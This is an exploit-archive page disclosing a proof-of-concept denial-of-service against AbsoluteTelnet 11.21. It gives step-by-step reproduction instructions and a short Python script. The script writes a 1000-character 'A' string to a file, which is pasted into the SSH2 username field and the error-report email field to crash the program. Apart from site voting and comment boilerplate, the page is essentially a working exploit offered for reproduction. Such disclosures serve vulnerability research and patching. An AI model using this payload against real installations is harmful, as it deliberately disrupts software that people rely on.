AbsoluteTelnet 11.21 Denial Of Service

2020.05.23

Credit: Xenofon Vassilakopoulos

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: AbsoluteTelnet 11.21 - 'SHA2/Username' and 'Send Error Report' Denial of Service (PoC)
# Discovered by: Xenofon Vassilakopoulos
# Discovered Date: 2020-05-21
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.21.exe
# Tested Version: 11.21
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1
# Steps to reproduce:
# 1. - Run python script
# 2. - Open absolutetelnet.txt and copy content to clipboard
# 3. - Open AbsoluteTelnet 11.21
# 4. - Select "new connection file -> Connection -> SSH2"
# 5. - Paste the contents at the field "Authentication -> Username"
# 6. - press "ok" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.21
# 9. - A new window will appear that prompts you to send an error report
# 10.- Open absolutetelnet.txt and copy content to clipboard
# 11.- Paste the contents at the field "Your Email Address (optional)"
# 12.- press "Send Error Report" button
# 13.- Crashed
buf = "\x41" * 1000
f = open ("absolutetelnet.txt", "w")
f.write(buf)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

AbsoluteTelnet 11.21 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.